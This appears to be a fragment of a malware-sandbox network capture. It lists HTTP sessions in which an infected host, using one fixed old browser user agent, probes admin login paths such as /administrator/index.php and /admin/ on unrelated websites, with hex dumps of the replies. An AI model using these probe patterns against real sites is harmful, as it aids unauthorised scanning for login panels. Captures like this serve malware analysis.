                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://mega.nz/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC969INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: MEGA-Chrome-Antileak
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 2689
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: 0
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: geoip=RO
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: default-src 'self' data: blob: *.mega.co.nz *.mega.nz *.mega.io http://*.mega.co.nz http://*.mega.nz http://*.mega.io wss://*.karere.mega.nz wss://*.sfu.mega.co.nz *.karere.mega.nz:1380 http://127.0.0.1:6341 localhost.megasyncloopback.mega.nz:6342; script-src 'self' *.mega.co.nz *.mega.nz *.mega.io data: blob:; style-src 'self' 'unsafe-inline' *.mega.co.nz *.mega.nz *.mega.io data: blob:; frame-src 'self' *.megapay.nz mega: *.megaad.nz https://mega.nz/ https://mega.io/; img-src 'self' *.mega.co.nz *.mega.nz *.mega.io data: blob: mega.nz
                                                                                                                                                                                                                                                                                                                                                                Connection: Close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC2689INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4d 45 47 41 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 45 47 41 20 70 72 6f 76 69 64 65 73 20 66 72 65 65 20 63 6c 6f 75 64 20 73 74 6f 72 61 67 65 20 77 69 74 68 20 63 6f 6e 76 65 6e 69 65 6e 74 20 61 6e 64 20 70 6f 77 65 72 66 75 6c 20 61 6c 77 61 79 73 2d 6f 6e 20 70 72 69 76 61 63 79 2e 20 43 6c 61 69 6d 20 79 6f 75 72 20 66 72 65 65 20 32 30 47 42 20 6e 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head><title>MEGA</title><meta name="description" content="MEGA provides free cloud storage with convenient and powerful always-on privacy. Claim your free 20GB now" /><meta property="og:title


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                141192.168.2.663933185.78.166.130443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC219OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: www.xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC359INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=413g84ktdejm8mm0c1531m1bv7; path=/
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC16025INData Raw: 31 64 30 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 68 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 21 2d 2d 20 53 74 61 72 74 20 4d 65 74 61 20 2d 2d 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 68 72 65 66 73 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 33 66 62 66 65 31 61 39 39 39 34 34 32 64 37 34 36 62 65 66 30 61 61 62 37 64 35 37 39 61 37 35 66 35 39 37 34 33 36 62 37 66 62 62 61 37 62 63 39 36
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 1d0f<!DOCTYPE html><html lang="th"><head> ... Start Meta --> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta name="ahrefs-site-verification" content="3fbfe1a999442d746bef0aab7d579a75f597436b7fbba7bc96
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC11835INData Raw: 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 20 63 6f 6c 6f 72 3a 20 67 72 65 65 6e 3b 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 22 3e 20 33 30 20 e0 b8 9a e0 b8 b2 e0 b8 97 3c 2f 73 70 61 6e 3e 20 e0 b8 a7 e0 b8 b1 e0 b8 99 e0 b8 99 e0 b8 b5 e0 b9 89 2d 20 33 31 20 e0 b8 aa e0 b8 b4 e0 b8 87 e0 b8 ab e0 b8 b2 e0 b8 84 e0 b8 a1 20 32 35 36 33 20 e0 b9 80 e0 b8 97 e0 b9 88 e0 b8 b2 e0 b8 99 e0 b8 b1 e0 b9 89 e0 b8 99 3c 2f 70 3e 20 2d 2d 3e 0a 09 09 09 09 09 09 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <span style="font-size: 22px; color: green; font-style: italic"> 30 </span> - 31 2563 </p> --> </div>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                142192.168.2.663457104.18.32.109443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC339OUTGET /admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: sport.autoplay.cloud
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: __cf_bm=YOyxb9aU78NaI96z2sr4QbRuq80T5iBgvIchIzUA8sc-1707131767-1-AeL6bfGfUZ6U/Ap1Ak+vwqFlIGc33k6j5+9DW+6potT7/e/iNxD6laTBd7Qn7PszDDObqSeT9QEqBj5vyiFCIYY=
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1181INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 12972
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Resource-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Origin-Agent-Cluster: ?1
                                                                                                                                                                                                                                                                                                                                                                Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                cf-mitigated: challenge
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd5c3f561d62-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC188INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edg
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 73 74 79 6c 65 3e 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 63 6f 6c 6f 72 3a 23 33 31 33 31 33 31 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 79 73 74 65 6d 2d 75 69 2c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e"><meta name="robots" content="noindex,nofollow"><meta name="viewport" content="width=device-width,initial-scale=1"><style>*{box-sizing:border-box;margin:0;padding:0}html{line-height:1.15;-webkit-text-size-adjust:100%;color:#313131;font-family:system-ui,
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 7a 34 29 3b 7d 7d 40 6d 69 78 69 6e 20 6c 69 67 68 74 2d 6d 6f 64 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 20 63 6f 6c 6f 72 3a 20 23 33 31 33 31 33 31 3b 20 61 20 7b 63 6f 6c 6f 72 3a 20 23 30 30 35 31 63 33 3b 20 26 3a 68 6f 76 65 72 20 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 65 65 37 33 30 61 3b 7d 7d 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 20 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 35 39 35 39 35 39 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 7d 20 2e 66 6f 6e 74 2d 72 65 64 20 7b 63 6f 6c 6f 72 3a 20 23 66 63 35 37 34 61 3b 7d 20 2e 62 69 67 2d 62 75 74 74 6f 6e 2c 2e 70 6f 77 2d 62 75
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: z4);}}@mixin light-mode{background-color: transparent; color: #313131; a {color: #0051c3; &:hover {text-decoration: underline; color: #ee730a;}} .lds-ring div {border-color: #595959 transparent transparent;} .font-red {color: #fc574a;} .big-button,.pow-bu
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 6d 7d 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e 7b 77 69 64 74 68 3a 31 2e 35 72 65 6d 3b 68 65 69 67 68 74 3a 31 2e 35 72 65 6d 7d 7d 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 2c 2e 66 6f 6f 74 65 72 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 2e 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 2e 35 72 65 6d 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 3b
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: m}.heading-favicon{width:1.5rem;height:1.5rem}}.main-content,.footer{padding-right:1.5rem;padding-left:1.5rem}.main-wrapper{display:flex;flex:1;flex-direction:column;align-items:center}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{line-height:3.75rem;
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ta:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDE
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 65 72 20 2e 72 61 79 2d 69 64 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 63 6f 64 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 61 63 6f 2c 63 6f 75 72 69 65 72 2c 6d 6f 6e 6f 73 70 61 63 65 7d 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6f 76 65 72 66 6c 6f 77 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 40 6d 65 64 69 61 20 28 77 69 64 74 68 20 3c 3d 20 37 32 30 70 78 29 7b 2e 64 69 61 67 6e 6f 73 74 69 63 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 7b 64 69 73 70 6c 61 79 3a 69 6e 69 74 69 61 6c 3b 63 6c 65 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: er .ray-id{text-align:center;code{font-family:monaco,courier,monospace}}.core-msg,.zone-name-title{overflow-wrap:break-word}@media (width <= 720px){.diagnostic-wrapper{display:flex;flex-wrap:wrap;justify-content:center}.clearfix:after{display:initial;clea
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 2f 6e 6f 73 63 72 69 70 74 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 73 70 6f 72 74 2e 61 75 74 6f 70 6c 61 79 2e 63 6c 6f 75 64 22 2c 63 54 79 70 65 3a 20 27 69 6e 74 65 72 61 63 74 69 76 65 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 39 30 34 35 31 27 2c 63 52 61 79 3a 20 27 38 35 30 61 62 64 35 63 33 66 35 36 31 64 36 32 27 2c 63 48 61 73 68 3a 20 27 39 63 31 34 31 31 61 63 33 30 65 33 62 34 34 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 61 64 6d 69 6e 5c 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 2e 4f 47 32 7a 58 5a 5f 6b 77 44 45 35 37 4f 73 67 30 35 32 71 4a 69 34 4c 65 72 47 72 39 6e 69 38
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: /noscript></div></div><script>(function(){window._cf_chl_opt={cvId: '3',cZone: "sport.autoplay.cloud",cType: 'interactive',cNounce: '90451',cRay: '850abd5c3f561d62',cHash: '9c1411ac30e3b44',cUPMDTk: "\/admin\/?__cf_chl_tk=.OG2zXZ_kwDE57Osg052qJi4LerGr9ni8
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 63 58 4f 61 4f 62 74 46 57 6c 4d 47 66 38 4b 2d 34 65 6f 4b 63 63 4f 49 48 74 6b 33 6a 69 47 36 43 52 35 4b 55 70 51 6a 41 7a 54 4d 37 34 39 50 2d 55 5f 6a 59 4f 4d 36 4f 35 6c 58 4e 51 4d 6b 45 61 4d 31 4b 4b 4a 68 5a 58 6c 68 34 37 53 63 61 6a 6f 59 2d 77 5f 57 6a 6b 4a 68 48 67 63 36 4a 37 4c 65 53 46 6c 37 4e 42 32 47 4d 43 4e 57 72 75 34 45 43 51 52 77 5a 67 64 4c 69 7a 30 65 6a 46 78 56 75 75 7a 79 49 39 6f 4f 53 36 4a 65 4d 52 54 30 6b 32 39 48 36 4b 52 65 30 57 6b 65 48 4c 71 4b 66 48 57 41 4a 43 31 50 4a 58 49 41 4f 48 70 71 4a 67 5f 62 70 6e 67 52 68 5f 65 64 35 65 44 53 35 67 53 73 76 48 6b 66 70 72 74 7a 70 4a 6d 4c 44 62 56 4f 44 70 6a 79 36 75 4b 76 6a 64 54 6c 4a 54 49 57 49 76 6e 30 67 47 6c 4d 72 7a 6c 52 5a 2d 45 44 56 35 74 7a 4f 76 58
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: cXOaObtFWlMGf8K-4eoKccOIHtk3jiG6CR5KUpQjAzTM749P-U_jYOM6O5lXNQMkEaM1KKJhZXlh47ScajoY-w_WjkJhHgc6J7LeSFl7NB2GMCNWru4ECQRwZgdLiz0ejFxVuuzyI9oOS6JeMRT0k29H6KRe0WkeHLqKfHWAJC1PJXIAOHpqJg_bpngRh_ed5eDS5gSsvHkfprtzpJmLDbVODpjy6uKvjdTlJTIWIvn0gGlMrzlRZ-EDV5tzOvX
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 45 61 58 51 36 67 4e 32 59 67 4f 69 42 51 79 48 62 6d 5a 4a 43 46 45 6b 61 6d 64 69 76 79 4a 41 73 48 44 79 64 57 53 61 51 70 64 72 6c 79 32 74 75 2d 47 57 38 4e 53 78 63 4b 30 6d 58 75 35 4f 74 47 79 32 78 69 55 5f 4c 54 77 71 53 43 6b 61 2d 50 36 48 57 4b 67 73 37 61 4f 4b 76 34 45 62 4f 50 46 73 38 4c 32 46 6b 49 51 61 30 54 39 58 76 31 56 59 46 5f 67 36 77 31 58 45 52 79 66 71 39 77 39 58 6e 72 44 2d 30 31 50 61 30 4e 48 53 6a 64 5a 68 79 79 77 67 45 67 49 45 52 36 36 75 79 45 4b 47 43 57 5a 54 6d 57 44 6c 52 6e 35 62 67 41 70 4a 68 44 46 68 78 51 6c 43 53 49 47 64 2d 61 6b 45 34 6e 78 64 4e 42 66 76 78 79 7a 44 48 4e 70 79 6f 34 67 48 74 43 39 5a 6e 4b 4c 68 74 6e 55 33 53 65 38 39 47 47 38 50 4a 68 34 50 36 79 4a 50 6e 58 5f 7a 6b 59 50 53 56 6b 33
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: EaXQ6gN2YgOiBQyHbmZJCFEkamdivyJAsHDydWSaQpdrly2tu-GW8NSxcK0mXu5OtGy2xiU_LTwqSCka-P6HWKgs7aOKv4EbOPFs8L2FkIQa0T9Xv1VYF_g6w1XERyfq9w9XnrD-01Pa0NHSjdZhyywgEgIER66uyEKGCWZTmWDlRn5bgApJhDFhxQlCSIGd-akE4nxdNBfvxyzDHNpyo4gHtC9ZnKLhtnU3Se89GG8PJh4P6yJPnX_zkYPSVk3
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 4c 6a 41 3d 27 2c 72 6d 3a 20 27 52 30 56 55 27 2c 64 3a 20 27 6f 7a 4a 6c 42 71 77 32 72 36 50 6f 31 61 76 4f 5a 34 32 49 37 55 50 48 6c 44 4c 43 6f 32 75 71 57 44 6e 66 4c 32 38 4a 50 7a 2f 6b 63 77 42 65 49 4d 53 73 57 50 61 38 2f 67 4a 6b 31 44 30 71 55 6f 37 6f 62 76 52 57 6b 33 38 59 42 74 55 74 50 6d 76 37 32 54 4a 54 4e 48 45 47 6a 75 67 72 68 72 72 59 37 38 61 58 59 69 59 72 32 4a 70 76 6a 69 4d 75 70 53 39 51 38 4f 2f 46 46 62 75 30 68 68 52 57 79 43 50 39 52 75 67 53 43 53 48 66 34 45 39 43 4e 49 38 4c 35 2b 4d 4f 56 31 73 76 5a 52 59 69 6a 55 56 7a 6f 35 51 79 42 56 70 67 41 50 59 63 57 71 6e 77 4d 62 46 37 73 59 34 67 67 2f 38 4d 58 6a 47 33 34 66 36 57 70 2b 7a 35 75 65 4e 6c 4d 52 53 6b 77 4c 4e 50 51 30 77 44 70 4e 4c 61 78 4e 58 37 73 77
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: LjA=',rm: 'R0VU',d: 'ozJlBqw2r6Po1avOZ42I7UPHlDLCo2uqWDnfL28JPz/kcwBeIMSsWPa8/gJk1D0qUo7obvRWk38YBtUtPmv72TJTNHEGjugrhrrY78aXYiYr2JpvjiMupS9Q8O/FFbu0hhRWyCP9RugSCSHf4E9CNI8L5+MOV1svZRYijUVzo5QyBVpgAPYcWqnwMbF7sY4gg/8MXjG34f6Wp+z5ueNlMRSkwLNPQ0wDpNLaxNX7sw


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                143192.168.2.66345836.255.71.45443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC188OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: instructory.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC204INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC27INData Raw: 31 30 0d 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 10File not found.0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                144192.168.2.66329131.13.88.1443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC191OUTGET /administrator/index.php HTTP/1.1
